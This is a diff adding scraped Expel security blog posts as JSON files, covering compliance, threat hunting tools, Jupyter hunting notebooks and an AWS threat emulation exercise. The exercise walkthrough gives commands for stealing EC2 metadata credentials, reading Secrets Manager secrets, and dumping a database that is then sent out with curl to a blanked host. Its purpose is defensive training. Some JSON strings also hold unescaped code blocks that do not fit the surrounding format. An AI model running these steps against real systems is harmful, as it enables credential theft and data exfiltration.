frameworks Government regulations Laws and treaties Customer audits For some compliance checks, you may go through an audit. Audits are for compliance frameworks where: Some policy/regulation oversight group has blessed specific audit companies to analyze how well you are complying with the framework; The compliance framework is standardized, so one auditor would likely find the same results as any other auditor; and The audit often results in some sort of certification saying you\u2019re compliant (wo0t!) \u2013 PCI DSS , ISO 27001 / 27701 and SOC 2 certifications are all pretty common. For other policies and regulations, you may go through a compliance assessment rather than an audit. For these regulations, there\u2019s no oversight group that sets out a strict framework to follow, so companies have to take their best guess as to whether or not they\u2019re compliant based on what they know about the policy or regulation requirements. One common example is GDPR \u2013 there\u2019s no official audit available, so your company may hire a third-party assessor to determine if your tech and policies are in line with the requirements to keep personal data secure. Compliance = things you need to do to keep your data and tech secure + someone verifying you\u2019ve done those things How Expel supports your compliance goals Lots of our customers here at Expel have various compliance standards they need to follow. 
Here\u2019s a peek at how we support some of the most common compliance frameworks, and how we think any MDR you choose to work with should support you in meeting your compliance goals. SOC2 : Expel is SOC2 Type 2 certified, meaning we\u2019ve demonstrated that we safely hold and process our customers\u2019 data. This is a good initial security certification to look for when you\u2019re evaluating MDRs. ISO 27001 / 27701 : Expel is also certified for these international cybersecurity and privacy standards, which are even more detailed and process-oriented than SOC2 (read: we care a lot about security!) If you have a complex security situation or strict industry security requirements, these certifications can help indicate that your MDR takes their security equally seriously. GDPR : There\u2019s no official GDPR audit available (yet), but we encourage our customers to work with a third party to perform their own independent GDPR assessment. We did the same here at Expel (feel free to ask us about it). If you\u2019re looking to comply with GDPR, your MDR should also meet GDPR-like requirements for handling your data. NIST 800-171 : Like GDPR, there\u2019s no official audit available right now for this standard to protect government unclassified information. At Expel, we did an internal self-assessment and are working with a third party for an independent assessment \u2013 we\u2019d encourage you to do the same. Working with Expel or other MDR can also help you fulfill a number of the standard\u2019s requirements regarding monitoring, alerting, reporting and responding to incidents. CMMC (Cybersecurity Maturity Model Certification) : This is an upcoming standard that\u2019s being included in a number of Department of Defense contracts for detailed, risk-based security. Since CMMC isn\u2019t fully rolled out, there aren\u2019t any auditors (yet) \u2013 but you can do what we did and have a third party perform an independent assessment to prepare for the rollout (Questions? Ask us !) PCI DSS : A designated PCI DSS auditor can analyze your compliance with this payment card data security standard. Expel can (and your MDR should) support your compliance by providing real time analysis and response to security alerts. HIPAA : Like for PCI DSS, Expel can support your HIPAA compliance by analyzing and responding to your security alerts in real time. To sum it up, your MDR should be able to support your compliance goals in three ways: They should help you meet the requirements for your desired compliance frameworks so you can get those certifications and meet your security goals (#winning). For example \u2013 going after PCI and need to ensure security alerts are being investigated? Have a security operations-related audit finding that you need to fix? Your MDR should be able to help. Your MDR should be able to demonstrate their compliance with various security/privacy standards to keep your data safe as their customer. Your MDR should help you maintain your existing compliance achievements. You\u2019re GDPR compliant? Great! Your MDR should make sure their work won\u2019t change that. Compliance may feel overwhelming, but think of your MDR as your compliance partner \u2013 holding hands to dive into the pool of NIST frameworks and ISO certifications together. Your MDR can help you make sure you\u2019ve got the right things in place to keep your tech and data secure, helping you breathe a little easier when it\u2019s time for your next audit or assessment." 
+} \ No newline at end of file diff --git a/how-to-build-a-useful-and-entertaining-threat-emulation.json b/how-to-build-a-useful-and-entertaining-threat-emulation.json new file mode 100644 index 0000000000000000000000000000000000000000..b376952877ca8bd4ac1618adb8791dd08b24080b --- /dev/null +++ b/how-to-build-a-useful-and-entertaining-threat-emulation.json @@ -0,0 +1,6 @@ +{ + "title": "How to build a useful (and entertaining) threat emulation ...", + "url": "https://expel.com/blog/how-to-build-useful-threat-emulation-exercise-aws/", + "date": "Apr 4, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to build a useful (and entertaining) threat emulation exercise for AWS Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN \u00b7 APR 4, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC If you ask the average security analyst how they detect threats in Amazon Web Services (AWS), you\u2019ll probably get some blank stares, shrugs or a few mumblings about exposed S3 buckets and bitcoin mining. The problem is that many orgs aren\u2019t fully aware of the risks that exist in their AWS environment, and they\u2019re still learning what they\u2019re responsible for securing versus what AWS monitors. That\u2019s exactly why we love threat emulation exercises and practice them regularly. Simulating realistic attacks in cloud environments help our analysts build muscle memory and prepare them to act quickly and correctly when something bad happens. Getting started Lots of our customers run at least part of their infrastructure in AWS, so we\u2019ve built quite a few threat emulation exercises that are specific to the AWS environment. They help our analysts sharpen their intuition around AWS services, better understand cloud-based evidence sources and dig into the investigative workflow. Want to create an AWS-focused threat emulation exercise? Here are our tips and tricks for building your own. Step 1: Define the goals and scope Sure, crafting the story for your exercise is the fun part but before putting pen to paper, think about what you (and your team, if you\u2019re lucky enough to have one) want to get out of the exercise. What are your goals? Here are the two priorities we had when we ran our first AWS threat emulation exercise: Learn about different kinds of AWS attacks, especially the ones that aren\u2019t intuitive AWS is a new challenge for security analysts who cut their teeth in traditional enterprise response, so there aren\u2019t many parallels between AWS attacks and the on-prem ones most security analysts are used to investigating. That\u2019s because there are tons of AWS services \u2014 over 100 to be exact \u2014 each with their own nuances and security implications. As an industry, we\u2019re still learning about areas of risk with each AWS service \u2014 think misconfiguration of Amazon S3 bucket access policies and credential theft via Amazon EC2 . By building some of these new attack vectors into our threat emulation exercises, we improved our SOC\u2019s ability to investigate and respond to these kinds of attacks when they happen in the real world. Get hands-on experience with common AWS services Even if you dedicate time to read through (the admittedly very comprehensive) AWS documentation , it\u2019s inevitably tough to remember it all (and know how to act on it) in a real-world, high-pressure situation. 
Getting hands-on experience with AWS services like Amazon EC2, Amazon S3 and Amazon RDS helps you commit this information to memory so you\u2019ll be more prepared to act quickly when an attack happens. For example, during threat emulation exercises Expel analysts log into \u201ccompromised\u201d EC2 instances and collect forensic information for analysis. Through this process, they get familiar with other sources of evidence from AWS services like Amazon CloudTrail and Amazon GuardDuty. Step 2: Build the thing Building a threat emulation requires more than just standing up infrastructure. Here are the building blocks you can use to create your own exercise: Craft an engaging story During threat emulations, you want your analysts to learn new things, work toward a common goal and have fun while doing all of it. Create a realistic story but add a dash of humor here and there. We created a fictional organization dubbed Widget-Corp, complete with pretend employees, a website and a business model. To make our scenario even more believable, we developed personas for Widget-Corp employees including descriptions of what \u201cnormal\u201d activities for these employees looked like. This gave our analysts the challenge of figuring out what behavior was legitimate and what was suspect during the simulation.Take a look at our Widget-Corp \u201cemployee\u201d profiles and the story we crafted: Employee Profile Mr. Widget He\u2019s the CEO of Widget-Corp. Mr. Widget can be a bit intense at times, but all in all he\u2019s a good boss that just wants to lead the booming widget market. His primary concern of late is the activities of Widget-Corp\u2019s biggest competitor \u2013 Best-Widgetz. Donna Reynolds Donna is a back-end engineer responsible for managing compute instances and the master Widget database containing sensitive customer information. Gerald Watson Gerald is a front-end web developer responsible for Widget-Corp\u2019s website. James Smith James is a Widget developer who builds and commits Widget source code. Norma Cooper Norma is a Sr. Widget developer and is responsible for final Widget code review. Background Widget-Corp has moved to the cloud! After one of the servers in the back office closet caught fire and nearly destroyed a fair amount of Widget source code, the executives finally decided that managing hardware in house didn\u2019t make sense. Widget-Corp now runs entirely out of AWS! In fact, their engineers were quite satisfied to discover that there are all kinds of AWS services that make shipping widgets and managing customer data much easier. They were even able to migrate their website https://widget-corp.com to AWS in a matter of hours! Hooray! Widget-Corp CEO, Mr. Widget, has noticed lately that a competitor (Best-Widgetz, Inc) has been releasing widgets to the market right before big Widget-Corp releases. To make matters worse, they seem to be ahead of the curve and are targeting functionality and customers of Widget-Corp! They\u2019ve already lost a few customers \u2026 this is not good. Additionally, their front end web developer, Gerald, recently noticed some weird updates to the about section on the website \u2026 Mr. Widget is a bit paranoid that something nefarious is going on and has hired Expel to run a surge engagement and identify if there are any signs of compromise in their AWS environment. If Best-Widgetz has managed to get customer data or source code somehow, that would put Widget-Corp at a serious disadvantage! 
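When you reach the "generate benign activity" step described below, a few lines of boto3 per persona go a long way. Here is a hypothetical sketch in which the profile, bucket, and key names are made up for the exercise:

```python
# Hypothetical sketch of scripting routine Widget-Corp persona activity with
# boto3 so the exercise has believable background noise. Profile, bucket, and
# key names are made up for illustration.
import boto3

def james_commits_source(profile="james-smith"):
    """James routinely uploads widget source code to S3."""
    s3 = boto3.Session(profile_name=profile).client("s3")
    s3.put_object(
        Bucket="widget-corp-source",          # hypothetical bucket
        Key="widgets/widget-v2.py",
        Body=b"print('hello widget')\n",
    )

def donna_checks_db_credentials(profile="donna-reynolds"):
    """Donna routinely reads the database secret while managing back-end instances."""
    sm = boto3.Session(profile_name=profile).client("secretsmanager")
    return sm.get_secret_value(SecretId="WidgetDatabaseCredentials")

if __name__ == "__main__":
    james_commits_source()
    donna_checks_db_credentials()
```

Running small scripts like these on a loose schedule keeps the log data looking lived-in, which makes the later "what's normal versus suspect" question genuinely hard for the analysts.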
Build believable infrastructure Build your environment based on the goals you set for the exercise. We created a new AWS account that included all the infrastructure we wanted to be part of the simulation. Pro tip: Create an architecture diagram to keep track of all the (literally) moving parts. Here\u2019s an example: Generate benign activity Remember those personas we created? Once our infrastructure was up and running, we generated \u201cnormal\u201d activity for each Widget-corp employee. This makes the exercise more realistic because you\u2019ll have to figure out what\u2019s routine (like Donna accessing a secret or James committing source code to an Amazon S3 bucket) versus a red flag. Generating this activity is easy. Just log in and perform the actions you\u2019d expect that persona to do in AWS on a regular basis. Choose a plausible attack scenario Think about the risks that exist in your own environment and use them as inspiration for your attack scenario. In our case, we simulated an end-to-end AWS attack starting with compromised credentials for a low-privilege user and ending in complete access to the environment. It may sound kind of extreme but this kind of attack happens more often than you\u2019d think \u2014 attackers often gain access to something small like an API key committed to a public GitHub repository and end up with the keys to the kingdom. Step 3: Execute the simulated attack Once you\u2019ve built your AWS environment and your scenario, it\u2019s time for the real fun to begin. Here\u2019s what our simulated attack looked like: Attacker gains initial access via compromised credentials We kicked off our scenario by having our attacker compromise credentials from one of our faux employees, Mr. Smith. Let\u2019s pretend he downloaded a file and inadvertently installed malware on his laptop. Our crafty attacker then logged into the Widget-Corp EC2 server with his credentials: Attacker pokes around for interesting data Now that the attacker is on the development server, he\u2019s trying to get his hands on any juicy corporate data. Maybe he does some basic discovery like:\u2022 Seeing what commands poor Mr. Smith ran recently (cat ~/.bash_history) \u2022 Searching the file system for interesting files In this case, the attacker sees that Mr. Smith wrote some widget source code and uploaded it to S3. Attacker escalates privileges Now this clever attacker has access to everything James Smith does, but that\u2019s not going to be enough to accomplish his mission. One common way attackers escalate privileges in AWS is to dump credentials from the EC2 instance metadata service. Our attacker knows this and tries to get credentials with additional permissions: Nice! By using curl to access the metadata service at 169.254.169.254, the attacker discovered that the widget development instance is assigned an IAM role EC2DeveloperRole and the attacker can retrieve temporary credentials for this role. Using these credentials, he can search for more company data. Now he\u2019s looking for the Widget Database server and Widget Web server credentials. Attacker collects web server and database secrets Our attacker stole access keys from the Widget-Corp development server and he\u2019s moving on to retrieving secrets stored in the AWS Secret Manager. Listing the available secrets is as easy as: aws --profile widget-dev secretsmanager list-secrets Jackpot! The attacker finds credentials for the Widget Database server and Widget Web server. 
Here\u2019s how he retrieved them: aws --profile widget-dev secretsmanager get-secret-value --secret-id WidgetDatabaseCredentials Attacker performs additional post-compromise activities The attacker isn\u2019t done quite yet. Now that he has the keys to the kingdom, he can do all kinds of nefarious things. For the purposes of this exercise, we pretended that he dumped and exfiltrated the contents of the database server and defaced the web server: mysqldump -h widgetcorp-db.us-east-1.rds.amazonaws.com -u dbadmin -p customerdata > dump.sql curl -X POST -d @dump.sql http://:443 Mission complete! Now that your attack scenario is ready to go, it\u2019s time to unleash the analysts and see if the team can retrace these steps \u2014 highlighting detection gaps along the way. Step 4: Build the investigative steps and guidelines Building out the process that analysts will follow for the exercise is just as crucial as building the infrastructure. All of your hard work will be for nothing if the analysts get stuck and frustrated. We\u2019ve had luck with using Google Forms to guide our analysts through the threat emulation exercise and prompt them to ask questions along the way. Here\u2019s an example of a few of the initial questions we ask our analysts to answer during the exercise: Once you have a draft, have someone else on your team who\u2019s experienced give it a read. This will help you identify any ambiguous steps or process gaps \u2014 basically areas that need tweaking in your plan \u2014 that might trip up your analysts. Step 5: Run the exercise Once you\u2019ve got your infrastructure up and running and have your simulation ready, press \u201cgo\u201d and have your analysts get to work. Schedule dedicated time for your analysts to run through the scenario, answer questions and hopefully learn a thing or two. As your analysts get to work, don\u2019t miss the opportunity for them to practice their communication skills. We\u2019ve had success (and a lot of fun) using the personas we create to inject a bit of chaos. For example, we\u2019ve had Mr. Widget himself call the SOC and request an update on how the investigation is going. This is a great way to get the team used to communicating about investigations in AWS. What\u2019s next? After running a threat emulation, it\u2019s valuable to talk as a team about what worked well and what we can do better next time. Don\u2019t fret if the exercise exposes gaps \u2014 that\u2019s the point! Document these gaps and see if you can make changes to improve your next exercise." +} \ No newline at end of file diff --git a/how-to-choose-the-right-security-tech-for-threat-hunting.json b/how-to-choose-the-right-security-tech-for-threat-hunting.json new file mode 100644 index 0000000000000000000000000000000000000000..782a2f264d784f6e322c4585374d4740e2467f17 --- /dev/null +++ b/how-to-choose-the-right-security-tech-for-threat-hunting.json @@ -0,0 +1,6 @@ +{ + "title": "How to choose the right security tech for threat hunting", + "url": "https://expel.com/blog/how-to-choose-right-security-tech-for-threat-hunting/", + "date": "Jun 4, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to choose the right security tech for threat hunting Security operations \u00b7 7 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUN 4, 2019 \u00b7 TAGS: Get technical / How to / Hunting / SOC / Tools Before joining Expel, I worked as a police officer in Alaska and spent my days focused on digital forensics. 
I loved combing through heaps of forensic data to find that one photo or text message to seal the case. There were more than a few cases where, after serving a warrant and seizing equipment, we had an entire rack of computers, phones and media storage devices waiting for analysis. I jumped right in, eager to see where the data would take me, and then I\u2019d click on the \u201cstart\u201d button to kick off that analysis. Several hours later, I\u2019d return and see that only a portion of the processing actually completed. But finding that one hidden gem required countless hours of string searching, regular expression searching, hash matching, dissecting sqlite data and plists, or searching through hex for header byte sequences. When I\u2019m digging through a mountain of data looking for evidence of a crime, or poking around trying to find an unauthorized login on a company\u2019s network, threat hunting feels the same \u2014 it\u2019s still that proverbial \u201cneedle in a haystack\u201d-type task. Although my old school version of threat hunting was more \u201cbows and arrows\u201d than NCIS, the goal of threat hunting today is still to separate the needle from the haystack \u2014 where the needle is an unauthorized activity and the haystack is \u201cbusiness as usual\u201d within the network. Today, there are lots of shiny tools at your disposal to use for threat hunting. But how do you decide which is right for your hunt? And will using multiple technologies speed up or slow down your hunt? Or does it depend on what you\u2019re hunting for? If you\u2019ve already got the basics of threat hunting down and know what you\u2019ll be looking for, here are some tips on how to choose the right weapon (er, tech) to carry out your hunt. (Psst: If you\u2019re new to threat hunting and are looking for more info on what threat hunting is and if it\u2019s right for your org, then you should read this post first.) Choosing the right weapon tool OPTION 1: USE YOUR EXISTING SIEM Use this technique when\u2026 You\u2019re looking for a low-cost, low-investment method of hunting, or when you\u2019re just testing the waters to see if threat hunting is something you (and your team, if you\u2019re lucky enough to have one) want to explore for your org. This method is especially useful when you don\u2019t have a development team at your disposal. If you\u2019re using your SIEM as your primary hunting tool, consider testing hunt techniques where you can aggregate multiple data sources. For example, when hunting for suspicious remote logins, you could correlate event logs, sysmon and firewall logs by time, user and source IP address into a single event. Then you can easily review the source reputation, authentication, and immediate processes performed to give greater decision support. Pros: Many SIEMs support the creation of custom dashboards, saved recurring queries, custom alerting and even custom triage workflows, such as Sumo Logic, Splunk, and Exabeam, so you can continually tweak and adjust your dashboards or queries. By using your existing SIEM to hunt, it\u2019s easy to roll your findings into finely tuned detections. As you discover true findings and learn what they look like, use your dashboards to look for specific indicators like domains, IPs and hashes that have helped you identify true findings in the past. Some SIEMs have great APIs where you can export data in order to augment that with other data sources elsewhere, such as OSINT or public/private intel APIs. 
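To make that correlation idea a bit more concrete, here's a rough sketch of stitching exported data sources together outside the SIEM. It assumes you've exported authentication events and firewall logs to CSV with the hypothetical column names shown below; adjust for whatever your SIEM actually produces:

```python
# Sketch: correlate exported auth events and firewall logs by user, source IP
# and time, similar to the SIEM aggregation described above.
# Column names (timestamp, user, source_ip, action) are hypothetical.
import pandas as pd

auth = pd.read_csv("auth_events.csv", parse_dates=["timestamp"]).sort_values("timestamp")
fw = pd.read_csv("firewall_logs.csv", parse_dates=["timestamp"]).sort_values("timestamp")

# Pair each auth event with the nearest firewall record (within 5 minutes)
# for the same user and source IP.
correlated = pd.merge_asof(
    auth,
    fw,
    on="timestamp",
    by=["user", "source_ip"],
    tolerance=pd.Timedelta("5min"),
    direction="nearest",
    suffixes=("_auth", "_fw"),
)

# Remote logins with no matching firewall context are worth a closer look.
print(correlated[correlated["action"].isna()][["timestamp", "user", "source_ip"]])
```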
Cons: There are a few downsides to using your SIEM for hunting. First, you\u2019re often limited by the types of data available from your SIEM, and the SIEM\u2019s retention rates which may be determined by corporate policy. For example, if you have data type X and Y but also need Z and your SIEM doesn\u2019t have it, then you\u2019re missing an important piece of the threat hunting puzzle. At some organizations security administrators will happily make changes to SIEM data sources, while others will make you jump through hoops to get that additional API data fed into the SIEM. Also, it can be hard to enrich SIEM data with things like open source intel, public/private intel APIs or endpoint tech data. Some orgs have gotten around this by having multiple SIEM environments that are governed by different corporate policies. The downside of using multiple SIEMs? Threat hunting gets a lot more expensive. OPTION 2: USE YOUR EXISTING ENDPOINT DETECTION AND RESPONSE (EDR) TECH Use this technique when\u2026 You\u2019re targeting specific behavioral patterns of attackers on endpoints and you have some development support for your team. Using EDR tech for threat hunting can be a great start but in order to get even more out of hunting with an EDR tech, you\u2019ll need to do some work to take advantage of that EDR tech\u2019s data. Over the years, I\u2019ve seen a lot of orgs waste resources by hunting in their EDR tech for open source indicators. Don\u2019t fall into that trap! Automate this task with saved queries and make sure that your EDR tool isn\u2019t already configured to do this work for you. Don\u2019t waste your time creating queries for known malware hashes your EDR tech is already designed to alert on. Instead, take advantage of the EDR\u2019s rich monitoring capability and create queries that focus on behavioral frameworks such as the MITRE ATT&CK Framework . Hunting should augment your detections and help fill gaps, not create extra or redundant triage work for you. Pros: Some EDR technologies like Tanium and Endgame allow you to rapidly query a targeted set of hosts and return a wealth of information from process executions with command line and process relationships with hashes. Carbon Black Response and CrowdStrike Falcon have phenomenal detail in describing process events and capture persistence commands, registry modifications, file modifications and network connections. Many EDR technologies today offer super detailed and targeted views of your endpoints. A good API, such as Carbon Black\u2019s or Endgame\u2019s, allows you to target and export very specific process details from a large number of hosts, and fast. Cons: It\u2019s not always easy to get the data that you need from your EDR. You\u2019ll need some way to export the data or pull it via API, a way to store it and a way to work with it. This could make it difficult for you to stack, sort and filter large volumes of hunt data \u2014 which means you can\u2019t enrich your hunt data with OSINT, public/private APIs or data from your SIEM. You also need to be sure that your EDR is retaining the data that you need (or that you\u2019re storing it elsewhere). If not, you\u2019re limited to hunting in short intervals or in real-time. OPTION 3: SECURITY TECH CONSOLE HUNTING Use this technique when\u2026 You don\u2019t have a SIEM or any EDR tech. 
Console hunting is a technique where you log into a particular security tech console like Palo Alto Networks or SentinelOne and hunt through the specific data provided through that console. For example, you could log into your firewall console and search for anomalous traffic. Though this technique might get results over time, it\u2019s labor intensive. I\u2019ve seen some analysts fall into the trap of aimlessly clicking around in the hopes of finding a gem within the data. This usually turns into a waste of time. If you want to use your console for hunting, here\u2019s a pro tip: outline a few guidelines to keep your analysts focused on gap analysis detection. The goal here is to identify what your security tech is not already alerting on. How can you leverage the visibility of your tech to detect behavioral indicators not yet being alerted on? Security tech alert review should take place in a separate workflow outside of hunting. Pros: If you already own some security tech and your analysts know how to use those tools, this is a super cost-effective option. Having a well-defined hunt to maintain your focus will keep you out of the analysis traps I mentioned above. Cons: Many security tools have less-than-great UIs. In my experience, the flashier and more futuristic the UI is, the less useful they really are and the more cumbersome they become to actually use. When it comes to using security tech for hunting, you\u2019re usually limited to the UI capabilities in the console. Generally, each security console looks at a limited scope of a specific aspect of your security posture. So if you\u2019re using your console for hunting, export your console data (if you can) so that you can manipulate it further, or feed it into a SIEM if you have one and enrich that data with data from other sources. At the very least, exporting that data into your SIEM will give you more searching, sorting, and filtering options than your console\u2019s UI will. OPTION 4: USING A CUSTOM SCRIPTING INTERPRETER Use this technique when\u2026 You don\u2019t have a SIEM or EDR tech, or when you want to enrich data from your SIEM or EDR tech. Custom scripting will require you to build out some custom tools or research and implement an open-source build found online. FYI, if you\u2019re going this route then make sure you have dev support, or at least a team member who\u2019s comfortable writing scripts. Pros: You can interface with any security tech with an available API and even enrich hunt data with OSINT and public/private intel APIs. Also, if you don\u2019t have an EDR, you can collect data using lots of available open-source projects like PowerForensics or OSQuery . With Powershell Remoting, SSH or EDR technologies you can collect raw data for parsing/analysis and hunt for the presence of specific forensic artifacts. Open-source projects such as Jupyter can ingest, parse, table and plot large volumes of collected data and provide really great decision support for your analysts. Cons: The flexibility here is sometimes outweighed by draining your resources. Creating your own custom hunt often requires lots of resources \u2014 namely people and time. Carefully structure your hunt, verify that you have permissions to carry out the hunt as described and the development support to engineer the code and execute it securely. (Pro tip: Don\u2019t create a super awesome forensics and data collection tool for your next attacker!) 
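If you end up going the custom-scripting route described above, the barrier to entry is lower than it sounds. As a rough illustration (assuming osquery is installed on the host you're collecting from), here's a small Python sketch that pulls process data with osqueryi and loads it into pandas for analysis:

```python
# Sketch: collect running-process data with osquery and load it for analysis.
# Assumes osqueryi is installed and on the PATH of the host you're querying.
import json
import subprocess

import pandas as pd

query = "SELECT pid, name, path, cmdline, parent FROM processes;"
result = subprocess.run(
    ["osqueryi", "--json", query],
    capture_output=True,
    text=True,
    check=True,
)

processes = pd.DataFrame(json.loads(result.stdout))

# From here you can stack, sort and filter, or enrich with OSINT/intel APIs.
print(processes["name"].value_counts().head(20))
```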
Getting started with threat hunting There are lots of things to think about when you create a hunting program. Beyond just selecting the tech you\u2019ll use, spend some time thinking about your goals and the resources you already have at your disposal. Will you need anything else to execute a program successfully? A new tool, or help from your engineering team? Jot down those considerations before you dive into threat hunting. Interested in threat hunting but don\u2019t have the resources to carry it out on your own? Drop us a note \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json b/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json new file mode 100644 index 0000000000000000000000000000000000000000..fecd867ec2c41d7029d601f5984250ef5c599851 --- /dev/null +++ b/how-to-create-and-maintain-jupyter-threat-hunting-notebooks.json @@ -0,0 +1,6 @@ +{ + "title": "How to create and maintain Jupyter threat hunting notebooks", + "url": "https://expel.com/blog/how-to-create-maintain-jupyter-threat-hunting-notebooks/", + "date": "Jun 16, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to create and maintain Jupyter threat hunting notebooks Tips \u00b7 6 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUN 16, 2020 \u00b7 TAGS: Get technical / Guide / Hunting / Managed detection and response / SOC / Threat hunting / Tools Expel recently had the privilege of participating in Infosec Jupyterthon . It was an awesome opportunity to share what we\u2019re learning about this open-source technology as well as learning from others about what they\u2019re finding, and unique perspectives on how to up our game in efficiency when it comes to incorporating this technology into infosec processes. Following our presentation, which you can check out here , a few participants reached out to me to ask about our process for developing and maintaining an entire library of threat hunting notebooks. In the spirit of sharing with the open-source community, I wanted to write a detailed response that\u2019s available to everyone. We believe that hunting is content that can and should be developed by subject matter experts (SMEs), and our best SMEs for hunt development are our SOC analysts. The job of engineering is to set up systems to enable those SMEs to focus on the parts of the problem that are relevant \u2013 like enabling really simple code deployment by linking GitHub and our CI/CD pipeline with JupyterHub (we wrote about that here ). Another example is using a shared chassis for all of our notebooks, allowing for sharing and reuse of boiler-plate components like API access, analyst notes and report formatting (we also wrote about that here ). By focusing efforts on these things as enabling technologies, our analysts can focus on building hunting techniques and analytics rather than worrying about barriers to deployment. Building off my last blog post , I thought I\u2019d cover how we use configuration files to build and configure our hunting notebooks, which allows our analysts to build new hunting notebooks without requiring them to learn Python. Going on the hunt So how do we do it? I\u2019m going to share a \u201cHello world!\u201d type example to demonstrate our implementation of this framework. But you can check out the complete source code here . 
Our goal behind the source code is to make it easy for our analysts to generate notebooks based on a standard template, yet allow each of the notebooks enough flexibility to provide unique capabilities required for a specific technique. For example, some of our hunts are based on network artifacts while other hunts are based on process artifacts or cloud platform API usage. Hunts based on network artifacts may have specific capabilities related to reverse DNS, IP address attribution or host to source traffic patterns. However, a process artifact hunt may require different capabilities such as hash reputation lookups and parent/child process relationship patterns. We need to keep the development simple and ensure that all our notebooks have the common capabilities yet allow the flexibility for our analysts to configure the specific capabilities they need to analyze and report on their hunting data sets. In order to do that, we\u2019re going to use yaml files to store easily modifiable configurations, and then build the notebooks from those configurations using the nbformat package in Python following five steps (plus one optional step). Step 1: Configure Docker I started off by configuring a working directory. In my example, I used a Docker container as my engine to run my build. I like using Docker because I can preconfigure my dependencies and anyone with Docker can later run my same build without having to configure any of their own dependencies. To get started with Docker , create a Dockerfile or use the example from my source code. Otherwise, make sure you have Python v.3.5+ installed as well as nbformat and PyYAML . Step 2: Create Configuration Directory Next, I created a directory to store my YAML configuration files. In my source code example, I used the \u201chunt_configs\u201d directory. I have two example hunts in this directory right now (see below); however, you can have as many configuration files as you\u2019d like. Each configuration file builds a new hunting notebook. Configuration file directory Step 3: Create YAML Configuration Files I then created a few YAML configuration files and created some key value pairs that I need in order to give my notebooks their unique characteristics and tools. Each configuration file builds a new hunting notebook. Once you create the file, it\u2019ll look something like this: YAML configuration file data Repeat step three as many times as you need to make sure you have enough notebooks for your hunting technique library. Step 4: Adjust the Build Script for Your Use Time for the Python builder script. I named my script \u201cnotebook_builder.py.\u201d You can name your script anything you want, just make sure that if you\u2019re using Docker, you update the filename in the Docker configuration files. This builder script is what reads the configuration files and generates our Jupyter notebook files (*.ipynb files). The primary function in this script is \u201crun_builder().\u201d First, this function needs to be able to find the current working directory and the directory which contains all of your YAML configuration files: Code to locate configuration files Second, the function will iterate over each of our configuration files so we ensure that we make a unique build for each configuration file. See an example below. Code to iterate over configuration files The function will then give our new notebook object a variable name. 
This is also where we can add any global metadata and create a new list to store all of the cells we\u2019re about to build. In the example below, I\u2019m using notebook metadata to hide the code cell input from view. I generally like to hide the code cell input so the user experience in Jupyter is more like a web application rather than a Python script. Code to build notebook object From here forward, we repeat the process of building and appending cells to our notebook cells list. There are many options for building your notebooks, including the ability to append \u201cnew_code_cell\u201d or \u201cnew_markdown_cell.\u201d Any data you want to be evaluated by your Jupyter notebook needs to be written in as string data. In this example, I want to import the Pandas package into my notebook. To do this, I\u2019ll append a \u201cnew_code_cell\u201d with the string value \u201cimport pandas.\u201d If I want to print \u201cHello world!\u201d I\u2019ll append a \u201cnew_code_cell\u201d with the string value \u201cprint(\u2018Hello World!\u2019).\u201d Nbformat provides helpful docs for more advanced use cases. Writing code into a notebook cell To insert data into our notebook, all we need to do is reference the data from our YAML file and insert the data using either the f-string or format string methods, like this: f-string example Format string example Our example hunting notebooks all have a title, a data normalization function, a \u201cStart Hunt\u201d button, a decision support section and a hunt data visualizer. The bottom section of the notebook is where each notebook takes on its unique characteristics. In the bottom section, we\u2019ve assembled a set of capabilities to assist with the analysis of the specific hunting techniques. These capabilities live in the \u201c downselects.py \u201d module. At Expel, we call these capabilities downselects. Downselects are designed to help our analysts break down the larger hunting technique theory into smaller sub-theories or subsets of information. We believe this helps to break down the \u201cfind a needle in the haystack\u201d approach to hunting. We also use downselects to provide analysts specific tools they will need to triage their hunting results. Downselects can be enrichment lookups like VirusTotal or Greynoise, or graphs and charts to visually display data in different aspects, or timelines and tables that focus on a specific sub-theory. When the analyst discovers interesting events or patterns in the downselects, they are armed with pivot points to triage and scope the larger dataset, rather than tearing through the dataset aimlessly. To learn more about how we use downselects, checkout our Jupyterthon presentation here . In order to access our downselects and build them into our notebooks, our builder script needs to iterate through a list of our downselects: Code example to iterate through list of dictionary objects We can then insert the function name and parameters from \u201c downselects.py \u201d as a string into a new_code_cell: Image: code example to execute function specified in YAML config file Lastly, our script needs to write our notebook object to a unique file name; otherwise, it will keep writing over the same filename as it iterates over our configuration files. Code example to write notebook So now we have the instructions written in order to build our new hunting notebooks. Let\u2019s build and run them in Jupyter! 
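To pull the pieces of this step together, here's a condensed sketch of the kind of builder loop described above. It isn't our production builder, and the config keys (title, downselects and so on) are illustrative rather than the exact schema we use, but it shows the nbformat and PyYAML mechanics:

```python
# Sketch: build one .ipynb per YAML config file using nbformat.
# The config keys (title, downselects) are illustrative, not an exact schema.
from pathlib import Path

import nbformat as nbf
import yaml

config_dir = Path("hunt_configs")

for config_path in config_dir.glob("*.yaml"):
    config = yaml.safe_load(config_path.read_text())

    notebook = nbf.v4.new_notebook()
    cells = [
        nbf.v4.new_markdown_cell(f"# {config['title']}"),
        nbf.v4.new_code_cell("import pandas"),
    ]

    # Each downselect entry becomes a code cell that calls a helper function
    # from the shared downselects module.
    for downselect in config.get("downselects", []):
        cells.append(
            nbf.v4.new_code_cell(
                f"downselects.{downselect['function']}({downselect.get('params', '')})"
            )
        )

    notebook["cells"] = cells

    # Write each notebook to a unique filename so builds don't overwrite each other.
    output_path = config_path.with_suffix(".ipynb").name
    nbf.write(notebook, output_path)
```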
